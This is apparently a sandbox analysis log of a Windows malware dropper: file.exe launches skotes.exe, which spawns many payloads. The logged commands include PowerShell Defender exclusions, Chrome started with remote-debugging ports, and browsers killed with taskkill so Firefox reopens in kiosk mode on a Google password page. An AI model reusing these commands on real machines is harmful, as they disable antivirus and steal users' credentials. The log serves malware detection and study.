                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: 85746525a0.exe, 0000000B.00000003.2613199474.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2611537544.00000000032F7000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3120744583.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3121749015.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3337291085.0000000005508000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3238610542.0000000005EF6000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3280444442.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: file.exeVirustotal: Detection: 56%
                              Source: file.exeReversingLabs: Detection: 52%
                              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe "C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe "C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeProcess created: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe "C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe "C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe "C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe "C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe "C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe "C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe"
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe "C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe "C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe"
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2072,i,2373336056486435438,11237397137693993043,262144 /prefetch:8
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe "C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe "C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe "C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe"
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe "C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2204,i,16921492917580984058,10404394460730179528,262144 /prefetch:8
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                              Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe "C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe"
                              Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2292 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ce4f639-b801-4da5-9524-7365bf392772} 2816 "\\.\pipe\gecko-crash-server-pipe.2816" 223fe469310 socket
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe "C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe "C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe "C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                              Source: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe "C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe "C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe "C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe "C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe "C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe "C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe "C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe "C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe "C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe "C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe "C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeProcess created: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe "C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe "C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess created: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe "C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2072,i,2373336056486435438,11237397137693993043,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe "C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe"
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2204,i,16921492917580984058,10404394460730179528,262144 /prefetch:8
                              Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                              Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2292 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ce4f639-b801-4da5-9524-7365bf392772} 2816 "\\.\pipe\gecko-crash-server-pipe.2816" 223fe469310 socket
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
